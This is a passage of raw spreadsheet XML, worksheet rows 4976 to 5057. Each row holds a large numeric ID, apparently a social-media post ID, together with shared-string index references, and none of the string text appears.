        <v>1</v>
      </c>
      <c r="D4976" t="s">
        <v>12352</v>
      </c>
      <c r="E4976" t="s">
        <v>12353</v>
      </c>
    </row>
    <row r="4977" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4977">
        <v>1.2343521965415301E+18</v>
      </c>
      <c r="B4977" t="s">
        <v>12354</v>
      </c>
      <c r="C4977" t="s">
        <v>1</v>
      </c>
      <c r="D4977" t="s">
        <v>12355</v>
      </c>
      <c r="E4977" t="s">
        <v>12356</v>
      </c>
    </row>
    <row r="4978" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4978">
        <v>1.23435171492639E+18</v>
      </c>
      <c r="B4978" t="s">
        <v>12357</v>
      </c>
      <c r="C4978" t="s">
        <v>1</v>
      </c>
      <c r="D4978" t="s">
        <v>12358</v>
      </c>
      <c r="E4978" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="4979" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4979">
        <v>1.2343514380521001E+18</v>
      </c>
      <c r="B4979" t="s">
        <v>12359</v>
      </c>
      <c r="C4979" t="s">
        <v>1</v>
      </c>
      <c r="D4979" t="s">
        <v>12360</v>
      </c>
      <c r="E4979" t="s">
        <v>12273</v>
      </c>
    </row>
    <row r="4980" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4980">
        <v>1.2343508000983501E+18</v>
      </c>
      <c r="B4980" t="s">
        <v>12361</v>
      </c>
      <c r="C4980" t="s">
        <v>1</v>
      </c>
      <c r="D4980" t="s">
        <v>12362</v>
      </c>
      <c r="E4980" t="s">
        <v>12363</v>
      </c>
    </row>
    <row r="4981" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4981">
        <v>1.23434772151709E+18</v>
      </c>
      <c r="B4981" t="s">
        <v>12364</v>
      </c>
      <c r="C4981" t="s">
        <v>1</v>
      </c>
      <c r="D4981" t="s">
        <v>12365</v>
      </c>
      <c r="E4981" t="s">
        <v>3568</v>
      </c>
    </row>
    <row r="4982" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4982">
        <v>1.2343473164605701E+18</v>
      </c>
      <c r="B4982" t="s">
        <v>12366</v>
      </c>
      <c r="C4982" t="s">
        <v>1</v>
      </c>
      <c r="D4982" t="s">
        <v>12367</v>
      </c>
      <c r="E4982" t="s">
        <v>891</v>
      </c>
    </row>
    <row r="4983" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4983">
        <v>1.23434699963968E+18</v>
      </c>
      <c r="B4983" t="s">
        <v>12368</v>
      </c>
      <c r="C4983" t="s">
        <v>1</v>
      </c>
      <c r="D4983" t="s">
        <v>3652</v>
      </c>
      <c r="E4983" t="s">
        <v>3653</v>
      </c>
    </row>
    <row r="4984" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4984">
        <v>1.23434594394589E+18</v>
      </c>
      <c r="B4984" t="s">
        <v>12369</v>
      </c>
      <c r="C4984" t="s">
        <v>1</v>
      </c>
      <c r="D4984" t="s">
        <v>12370</v>
      </c>
      <c r="E4984" t="s">
        <v>12371</v>
      </c>
    </row>
    <row r="4985" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4985">
        <v>1.23434474938719E+18</v>
      </c>
      <c r="B4985" t="s">
        <v>12372</v>
      </c>
      <c r="C4985" t="s">
        <v>1</v>
      </c>
      <c r="D4985" t="s">
        <v>12373</v>
      </c>
      <c r="E4985" t="s">
        <v>12374</v>
      </c>
    </row>
    <row r="4986" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4986">
        <v>1.2343447300304599E+18</v>
      </c>
      <c r="B4986" t="s">
        <v>12375</v>
      </c>
      <c r="C4986" t="s">
        <v>1</v>
      </c>
      <c r="D4986" t="s">
        <v>12376</v>
      </c>
      <c r="E4986" t="s">
        <v>5387</v>
      </c>
    </row>
    <row r="4987" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4987">
        <v>1.23434460689405E+18</v>
      </c>
      <c r="B4987" t="s">
        <v>12377</v>
      </c>
      <c r="C4987" t="s">
        <v>1</v>
      </c>
      <c r="D4987" t="s">
        <v>12378</v>
      </c>
      <c r="E4987" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="4988" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4988">
        <v>1.23434397270269E+18</v>
      </c>
      <c r="B4988" t="s">
        <v>12379</v>
      </c>
      <c r="C4988" t="s">
        <v>1</v>
      </c>
      <c r="D4988" t="s">
        <v>12380</v>
      </c>
      <c r="E4988" t="s">
        <v>649</v>
      </c>
    </row>
    <row r="4989" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4989">
        <v>1.23434393979842E+18</v>
      </c>
      <c r="B4989" t="s">
        <v>12381</v>
      </c>
      <c r="C4989" t="s">
        <v>1</v>
      </c>
      <c r="D4989" t="s">
        <v>12382</v>
      </c>
      <c r="E4989" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="4990" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4990">
        <v>1.2343433486279601E+18</v>
      </c>
      <c r="B4990" t="s">
        <v>12383</v>
      </c>
      <c r="C4990" t="s">
        <v>1</v>
      </c>
      <c r="D4990" t="s">
        <v>12384</v>
      </c>
      <c r="E4990" t="s">
        <v>12385</v>
      </c>
    </row>
    <row r="4991" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4991">
        <v>1.2343428855810801E+18</v>
      </c>
      <c r="B4991" t="s">
        <v>12386</v>
      </c>
      <c r="C4991" t="s">
        <v>1</v>
      </c>
      <c r="D4991" t="s">
        <v>12387</v>
      </c>
      <c r="E4991" t="s">
        <v>12388</v>
      </c>
    </row>
    <row r="4992" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4992">
        <v>1.23434268494656E+18</v>
      </c>
      <c r="B4992" t="s">
        <v>12389</v>
      </c>
      <c r="C4992" t="s">
        <v>1</v>
      </c>
      <c r="D4992" t="s">
        <v>12390</v>
      </c>
      <c r="E4992" t="s">
        <v>3848</v>
      </c>
    </row>
    <row r="4993" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4993">
        <v>1.23434268339027E+18</v>
      </c>
      <c r="B4993" t="s">
        <v>12389</v>
      </c>
      <c r="C4993" t="s">
        <v>1</v>
      </c>
      <c r="D4993" t="s">
        <v>12391</v>
      </c>
      <c r="E4993" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="4994" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4994">
        <v>1.2343426824381801E+18</v>
      </c>
      <c r="B4994" t="s">
        <v>12389</v>
      </c>
      <c r="C4994" t="s">
        <v>1</v>
      </c>
      <c r="D4994" t="s">
        <v>12392</v>
      </c>
      <c r="E4994" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="4995" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4995">
        <v>1.2343426763102899E+18</v>
      </c>
      <c r="B4995" t="s">
        <v>12393</v>
      </c>
      <c r="C4995" t="s">
        <v>1</v>
      </c>
      <c r="D4995" t="s">
        <v>12394</v>
      </c>
      <c r="E4995" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="4996" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4996">
        <v>1.2343426758237701E+18</v>
      </c>
      <c r="B4996" t="s">
        <v>12393</v>
      </c>
      <c r="C4996" t="s">
        <v>1</v>
      </c>
      <c r="D4996" t="s">
        <v>12395</v>
      </c>
      <c r="E4996" t="s">
        <v>12396</v>
      </c>
    </row>
    <row r="4997" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4997">
        <v>1.2343423992221701E+18</v>
      </c>
      <c r="B4997" t="s">
        <v>12397</v>
      </c>
      <c r="C4997" t="s">
        <v>1</v>
      </c>
      <c r="D4997" t="s">
        <v>12398</v>
      </c>
      <c r="E4997" t="s">
        <v>6699</v>
      </c>
    </row>
    <row r="4998" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4998">
        <v>1.2343411636682601E+18</v>
      </c>
      <c r="B4998" t="s">
        <v>12399</v>
      </c>
      <c r="C4998" t="s">
        <v>1</v>
      </c>
      <c r="D4998" t="s">
        <v>12400</v>
      </c>
      <c r="E4998" t="s">
        <v>12401</v>
      </c>
    </row>
    <row r="4999" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4999">
        <v>1.23434040969185E+18</v>
      </c>
      <c r="B4999" t="s">
        <v>12402</v>
      </c>
      <c r="C4999" t="s">
        <v>1</v>
      </c>
      <c r="D4999" t="s">
        <v>12403</v>
      </c>
      <c r="E4999" t="s">
        <v>1125</v>
      </c>
    </row>
    <row r="5000" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5000">
        <v>1.2343402254862899E+18</v>
      </c>
      <c r="B5000" t="s">
        <v>12404</v>
      </c>
      <c r="C5000" t="s">
        <v>1</v>
      </c>
      <c r="D5000" t="s">
        <v>12405</v>
      </c>
      <c r="E5000" t="s">
        <v>12406</v>
      </c>
    </row>
    <row r="5001" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5001">
        <v>1.2343388037850601E+18</v>
      </c>
      <c r="B5001" t="s">
        <v>12407</v>
      </c>
      <c r="C5001" t="s">
        <v>1</v>
      </c>
      <c r="D5001" t="s">
        <v>12408</v>
      </c>
      <c r="E5001" t="s">
        <v>12409</v>
      </c>
    </row>
    <row r="5002" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5002">
        <v>1.23433821053857E+18</v>
      </c>
      <c r="B5002" t="s">
        <v>12410</v>
      </c>
      <c r="C5002" t="s">
        <v>1</v>
      </c>
      <c r="D5002" t="s">
        <v>12411</v>
      </c>
      <c r="E5002" t="s">
        <v>12412</v>
      </c>
    </row>
    <row r="5003" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5003">
        <v>1.2343375723624E+18</v>
      </c>
      <c r="B5003" t="s">
        <v>12413</v>
      </c>
      <c r="C5003" t="s">
        <v>1</v>
      </c>
      <c r="D5003" t="s">
        <v>12414</v>
      </c>
      <c r="E5003" t="s">
        <v>503</v>
      </c>
    </row>
    <row r="5004" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5004">
        <v>1.2343363905963899E+18</v>
      </c>
      <c r="B5004" t="s">
        <v>12415</v>
      </c>
      <c r="C5004" t="s">
        <v>1</v>
      </c>
      <c r="D5004" t="s">
        <v>12416</v>
      </c>
      <c r="E5004" t="s">
        <v>5394</v>
      </c>
    </row>
    <row r="5005" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5005">
        <v>1.2343360933251999E+18</v>
      </c>
      <c r="B5005" t="s">
        <v>12417</v>
      </c>
      <c r="C5005" t="s">
        <v>1</v>
      </c>
      <c r="D5005" t="s">
        <v>12418</v>
      </c>
      <c r="E5005" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="5006" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5006">
        <v>1.23433583467087E+18</v>
      </c>
      <c r="B5006" t="s">
        <v>12419</v>
      </c>
      <c r="C5006" t="s">
        <v>1</v>
      </c>
      <c r="D5006" t="s">
        <v>12420</v>
      </c>
      <c r="E5006" t="s">
        <v>12421</v>
      </c>
    </row>
    <row r="5007" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5007">
        <v>1.234334874368E+18</v>
      </c>
      <c r="B5007" t="s">
        <v>12422</v>
      </c>
      <c r="C5007" t="s">
        <v>1</v>
      </c>
      <c r="D5007" t="s">
        <v>12423</v>
      </c>
      <c r="E5007" t="s">
        <v>12424</v>
      </c>
    </row>
    <row r="5008" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5008">
        <v>1.23433484899666E+18</v>
      </c>
      <c r="B5008" t="s">
        <v>12425</v>
      </c>
      <c r="C5008" t="s">
        <v>1</v>
      </c>
      <c r="D5008" t="s">
        <v>12426</v>
      </c>
      <c r="E5008" t="s">
        <v>12427</v>
      </c>
    </row>
    <row r="5009" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5009">
        <v>1.2343342723806001E+18</v>
      </c>
      <c r="B5009" t="s">
        <v>12428</v>
      </c>
      <c r="C5009" t="s">
        <v>1</v>
      </c>
      <c r="D5009" t="s">
        <v>12429</v>
      </c>
      <c r="E5009" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5010" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5010">
        <v>1.2343329743148101E+18</v>
      </c>
      <c r="B5010" t="s">
        <v>12430</v>
      </c>
      <c r="C5010" t="s">
        <v>1</v>
      </c>
      <c r="D5010" t="s">
        <v>12431</v>
      </c>
      <c r="E5010" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5011" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5011">
        <v>1.23433289484945E+18</v>
      </c>
      <c r="B5011" t="s">
        <v>12432</v>
      </c>
      <c r="C5011" t="s">
        <v>1</v>
      </c>
      <c r="D5011" t="s">
        <v>12433</v>
      </c>
      <c r="E5011" t="s">
        <v>12434</v>
      </c>
    </row>
    <row r="5012" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5012">
        <v>1.2343299734244401E+18</v>
      </c>
      <c r="B5012" t="s">
        <v>12435</v>
      </c>
      <c r="C5012" t="s">
        <v>1</v>
      </c>
      <c r="D5012" t="s">
        <v>12436</v>
      </c>
      <c r="E5012" t="s">
        <v>12437</v>
      </c>
    </row>
    <row r="5013" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5013">
        <v>1.23432985886545E+18</v>
      </c>
      <c r="B5013" t="s">
        <v>12438</v>
      </c>
      <c r="C5013" t="s">
        <v>1</v>
      </c>
      <c r="D5013" t="s">
        <v>12439</v>
      </c>
      <c r="E5013" t="s">
        <v>12440</v>
      </c>
    </row>
    <row r="5014" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5014">
        <v>1.2343292919381299E+18</v>
      </c>
      <c r="B5014" t="s">
        <v>12441</v>
      </c>
      <c r="C5014" t="s">
        <v>1</v>
      </c>
      <c r="D5014" t="s">
        <v>12442</v>
      </c>
      <c r="E5014" t="s">
        <v>12443</v>
      </c>
    </row>
    <row r="5015" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5015">
        <v>1.2343288545267E+18</v>
      </c>
      <c r="B5015" t="s">
        <v>12444</v>
      </c>
      <c r="C5015" t="s">
        <v>1</v>
      </c>
      <c r="D5015" t="s">
        <v>12445</v>
      </c>
      <c r="E5015" t="s">
        <v>12446</v>
      </c>
    </row>
    <row r="5016" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5016">
        <v>1.23432884834446E+18</v>
      </c>
      <c r="B5016" t="s">
        <v>12447</v>
      </c>
      <c r="C5016" t="s">
        <v>1</v>
      </c>
      <c r="D5016" t="s">
        <v>12448</v>
      </c>
      <c r="E5016" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="5017" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5017">
        <v>1.2343279055194801E+18</v>
      </c>
      <c r="B5017" t="s">
        <v>12449</v>
      </c>
      <c r="C5017" t="s">
        <v>1</v>
      </c>
      <c r="D5017" t="s">
        <v>12450</v>
      </c>
      <c r="E5017" t="s">
        <v>10252</v>
      </c>
    </row>
    <row r="5018" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5018">
        <v>1.2343271470760801E+18</v>
      </c>
      <c r="B5018" t="s">
        <v>12451</v>
      </c>
      <c r="C5018" t="s">
        <v>1</v>
      </c>
      <c r="D5018" t="s">
        <v>814</v>
      </c>
      <c r="E5018" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="5019" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5019">
        <v>1.23432580900483E+18</v>
      </c>
      <c r="B5019" t="s">
        <v>12452</v>
      </c>
      <c r="C5019" t="s">
        <v>1</v>
      </c>
      <c r="D5019" t="s">
        <v>12453</v>
      </c>
      <c r="E5019" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="5020" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5020">
        <v>1.23432511441133E+18</v>
      </c>
      <c r="B5020" t="s">
        <v>12454</v>
      </c>
      <c r="C5020" t="s">
        <v>1</v>
      </c>
      <c r="D5020" t="s">
        <v>12455</v>
      </c>
      <c r="E5020" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="5021" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5021">
        <v>1.2343248152651799E+18</v>
      </c>
      <c r="B5021" t="s">
        <v>12456</v>
      </c>
      <c r="C5021" t="s">
        <v>1</v>
      </c>
      <c r="D5021" t="s">
        <v>12457</v>
      </c>
      <c r="E5021" t="s">
        <v>12458</v>
      </c>
    </row>
    <row r="5022" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5022">
        <v>1.2343240623331E+18</v>
      </c>
      <c r="B5022" t="s">
        <v>12459</v>
      </c>
      <c r="C5022" t="s">
        <v>1</v>
      </c>
      <c r="D5022" t="s">
        <v>12460</v>
      </c>
      <c r="E5022" t="s">
        <v>9927</v>
      </c>
    </row>
    <row r="5023" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5023">
        <v>1.2343229626579999E+18</v>
      </c>
      <c r="B5023" t="s">
        <v>12461</v>
      </c>
      <c r="C5023" t="s">
        <v>1</v>
      </c>
      <c r="D5023" t="s">
        <v>12462</v>
      </c>
      <c r="E5023" t="s">
        <v>12463</v>
      </c>
    </row>
    <row r="5024" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5024">
        <v>1.2343224160101299E+18</v>
      </c>
      <c r="B5024" t="s">
        <v>12464</v>
      </c>
      <c r="C5024" t="s">
        <v>1</v>
      </c>
      <c r="D5024" t="s">
        <v>12465</v>
      </c>
      <c r="E5024" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5025" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5025">
        <v>1.23432124339182E+18</v>
      </c>
      <c r="B5025" t="s">
        <v>12466</v>
      </c>
      <c r="C5025" t="s">
        <v>1</v>
      </c>
      <c r="D5025" t="s">
        <v>12467</v>
      </c>
      <c r="E5025" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5026" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5026">
        <v>1.2343200740029399E+18</v>
      </c>
      <c r="B5026" t="s">
        <v>12468</v>
      </c>
      <c r="C5026" t="s">
        <v>1</v>
      </c>
      <c r="D5026" t="s">
        <v>12469</v>
      </c>
      <c r="E5026" t="s">
        <v>3033</v>
      </c>
    </row>
    <row r="5027" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5027">
        <v>1.23431959423331E+18</v>
      </c>
      <c r="B5027" t="s">
        <v>12470</v>
      </c>
      <c r="C5027" t="s">
        <v>1</v>
      </c>
      <c r="D5027" t="s">
        <v>12471</v>
      </c>
      <c r="E5027" t="s">
        <v>12440</v>
      </c>
    </row>
    <row r="5028" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5028">
        <v>1.2343189917468301E+18</v>
      </c>
      <c r="B5028" t="s">
        <v>12472</v>
      </c>
      <c r="C5028" t="s">
        <v>1</v>
      </c>
      <c r="D5028" t="s">
        <v>12473</v>
      </c>
      <c r="E5028" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="5029" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5029">
        <v>1.2343182346875899E+18</v>
      </c>
      <c r="B5029" t="s">
        <v>12474</v>
      </c>
      <c r="C5029" t="s">
        <v>1</v>
      </c>
      <c r="D5029" t="s">
        <v>12475</v>
      </c>
      <c r="E5029" t="s">
        <v>12476</v>
      </c>
    </row>
    <row r="5030" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5030">
        <v>1.2343174868306199E+18</v>
      </c>
      <c r="B5030" t="s">
        <v>12477</v>
      </c>
      <c r="C5030" t="s">
        <v>1</v>
      </c>
      <c r="D5030" t="s">
        <v>12478</v>
      </c>
      <c r="E5030" t="s">
        <v>956</v>
      </c>
    </row>
    <row r="5031" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5031">
        <v>1.23431728495455E+18</v>
      </c>
      <c r="B5031" t="s">
        <v>12479</v>
      </c>
      <c r="C5031" t="s">
        <v>1</v>
      </c>
      <c r="D5031" t="s">
        <v>12480</v>
      </c>
      <c r="E5031" t="s">
        <v>1740</v>
      </c>
    </row>
    <row r="5032" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5032">
        <v>1.23431728012269E+18</v>
      </c>
      <c r="B5032" t="s">
        <v>12481</v>
      </c>
      <c r="C5032" t="s">
        <v>1</v>
      </c>
      <c r="D5032" t="s">
        <v>12482</v>
      </c>
      <c r="E5032" t="s">
        <v>1740</v>
      </c>
    </row>
    <row r="5033" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5033">
        <v>1.2343166791460201E+18</v>
      </c>
      <c r="B5033" t="s">
        <v>12483</v>
      </c>
      <c r="C5033" t="s">
        <v>1</v>
      </c>
      <c r="D5033" t="s">
        <v>12484</v>
      </c>
      <c r="E5033" t="s">
        <v>12485</v>
      </c>
    </row>
    <row r="5034" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5034">
        <v>1.2343164976415601E+18</v>
      </c>
      <c r="B5034" t="s">
        <v>12486</v>
      </c>
      <c r="C5034" t="s">
        <v>1</v>
      </c>
      <c r="D5034" t="s">
        <v>12487</v>
      </c>
      <c r="E5034" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="5035" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5035">
        <v>1.2343162910722401E+18</v>
      </c>
      <c r="B5035" t="s">
        <v>12488</v>
      </c>
      <c r="C5035" t="s">
        <v>1</v>
      </c>
      <c r="D5035" t="s">
        <v>12489</v>
      </c>
      <c r="E5035" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="5036" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5036">
        <v>1.2343159219944499E+18</v>
      </c>
      <c r="B5036" t="s">
        <v>12490</v>
      </c>
      <c r="C5036" t="s">
        <v>1</v>
      </c>
      <c r="D5036" t="s">
        <v>12491</v>
      </c>
      <c r="E5036" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="5037" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5037">
        <v>1.23431382185618E+18</v>
      </c>
      <c r="B5037" t="s">
        <v>12492</v>
      </c>
      <c r="C5037" t="s">
        <v>1</v>
      </c>
      <c r="D5037" t="s">
        <v>12493</v>
      </c>
      <c r="E5037" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="5038" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5038">
        <v>1.23431267590941E+18</v>
      </c>
      <c r="B5038" t="s">
        <v>12494</v>
      </c>
      <c r="C5038" t="s">
        <v>1</v>
      </c>
      <c r="D5038" t="s">
        <v>12495</v>
      </c>
      <c r="E5038" t="s">
        <v>817</v>
      </c>
    </row>
    <row r="5039" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5039">
        <v>1.2343125597060401E+18</v>
      </c>
      <c r="B5039" t="s">
        <v>12496</v>
      </c>
      <c r="C5039" t="s">
        <v>1</v>
      </c>
      <c r="D5039" t="s">
        <v>12497</v>
      </c>
      <c r="E5039" t="s">
        <v>12498</v>
      </c>
    </row>
    <row r="5040" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5040">
        <v>1.2343125121470001E+18</v>
      </c>
      <c r="B5040" t="s">
        <v>12499</v>
      </c>
      <c r="C5040" t="s">
        <v>1</v>
      </c>
      <c r="D5040" t="s">
        <v>12500</v>
      </c>
      <c r="E5040" t="s">
        <v>12501</v>
      </c>
    </row>
    <row r="5041" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5041">
        <v>1.23431249838958E+18</v>
      </c>
      <c r="B5041" t="s">
        <v>12502</v>
      </c>
      <c r="C5041" t="s">
        <v>1</v>
      </c>
      <c r="D5041" t="s">
        <v>12503</v>
      </c>
      <c r="E5041" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="5042" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5042">
        <v>1.2343124900471401E+18</v>
      </c>
      <c r="B5042" t="s">
        <v>12504</v>
      </c>
      <c r="C5042" t="s">
        <v>1</v>
      </c>
      <c r="D5042" t="s">
        <v>12505</v>
      </c>
      <c r="E5042" t="s">
        <v>12506</v>
      </c>
    </row>
    <row r="5043" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5043">
        <v>1.2343124715082199E+18</v>
      </c>
      <c r="B5043" t="s">
        <v>12507</v>
      </c>
      <c r="C5043" t="s">
        <v>1</v>
      </c>
      <c r="D5043" t="s">
        <v>12508</v>
      </c>
      <c r="E5043" t="s">
        <v>766</v>
      </c>
    </row>
    <row r="5044" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5044">
        <v>1.23431136924943E+18</v>
      </c>
      <c r="B5044" t="s">
        <v>12509</v>
      </c>
      <c r="C5044" t="s">
        <v>1</v>
      </c>
      <c r="D5044" t="s">
        <v>828</v>
      </c>
      <c r="E5044" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5045" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5045">
        <v>1.2343113609154099E+18</v>
      </c>
      <c r="B5045" t="s">
        <v>12510</v>
      </c>
      <c r="C5045" t="s">
        <v>1</v>
      </c>
      <c r="D5045" t="s">
        <v>12511</v>
      </c>
      <c r="E5045" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5046" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5046">
        <v>1.2343113592711401E+18</v>
      </c>
      <c r="B5046" t="s">
        <v>12510</v>
      </c>
      <c r="C5046" t="s">
        <v>1</v>
      </c>
      <c r="D5046" t="s">
        <v>12512</v>
      </c>
      <c r="E5046" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5047" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5047">
        <v>1.2343113561213299E+18</v>
      </c>
      <c r="B5047" t="s">
        <v>12513</v>
      </c>
      <c r="C5047" t="s">
        <v>1</v>
      </c>
      <c r="D5047" t="s">
        <v>12514</v>
      </c>
      <c r="E5047" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5048" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5048">
        <v>1.23431135378511E+18</v>
      </c>
      <c r="B5048" t="s">
        <v>12515</v>
      </c>
      <c r="C5048" t="s">
        <v>1</v>
      </c>
      <c r="D5048" t="s">
        <v>831</v>
      </c>
      <c r="E5048" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5049" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5049">
        <v>1.2343113509916401E+18</v>
      </c>
      <c r="B5049" t="s">
        <v>12515</v>
      </c>
      <c r="C5049" t="s">
        <v>1</v>
      </c>
      <c r="D5049" t="s">
        <v>833</v>
      </c>
      <c r="E5049" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5050" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5050">
        <v>1.2343113467512E+18</v>
      </c>
      <c r="B5050" t="s">
        <v>12516</v>
      </c>
      <c r="C5050" t="s">
        <v>1</v>
      </c>
      <c r="D5050" t="s">
        <v>12517</v>
      </c>
      <c r="E5050" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5051" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5051">
        <v>1.23431134508611E+18</v>
      </c>
      <c r="B5051" t="s">
        <v>12518</v>
      </c>
      <c r="C5051" t="s">
        <v>1</v>
      </c>
      <c r="D5051" t="s">
        <v>836</v>
      </c>
      <c r="E5051" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5052" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5052">
        <v>1.2343113422800499E+18</v>
      </c>
      <c r="B5052" t="s">
        <v>12518</v>
      </c>
      <c r="C5052" t="s">
        <v>1</v>
      </c>
      <c r="D5052" t="s">
        <v>839</v>
      </c>
      <c r="E5052" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5053" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5053">
        <v>1.23431133884493E+18</v>
      </c>
      <c r="B5053" t="s">
        <v>12519</v>
      </c>
      <c r="C5053" t="s">
        <v>1</v>
      </c>
      <c r="D5053" t="s">
        <v>841</v>
      </c>
      <c r="E5053" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5054" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5054">
        <v>1.2343113371629599E+18</v>
      </c>
      <c r="B5054" t="s">
        <v>12520</v>
      </c>
      <c r="C5054" t="s">
        <v>1</v>
      </c>
      <c r="D5054" t="s">
        <v>842</v>
      </c>
      <c r="E5054" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5055" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5055">
        <v>1.2343113342437601E+18</v>
      </c>
      <c r="B5055" t="s">
        <v>12520</v>
      </c>
      <c r="C5055" t="s">
        <v>1</v>
      </c>
      <c r="D5055" t="s">
        <v>844</v>
      </c>
      <c r="E5055" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5056" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5056">
        <v>1.23431132849345E+18</v>
      </c>
      <c r="B5056" t="s">
        <v>12521</v>
      </c>
      <c r="C5056" t="s">
        <v>1</v>
      </c>
      <c r="D5056" t="s">
        <v>12522</v>
      </c>
      <c r="E5056" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5057" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5057">
        <v>1.23431132601454E+18</v>
      </c>
      <c r="B5057" t="s">
        <v>12521</v>
      </c>
      <c r="C5057" t="s">
        <v>1</v>
      </c>
      <c r="D5057" t="s">
        <v>852</v>
      </c>
      <c r="E5057" t="s">
        <v>829</v>
      </c>
    </row>
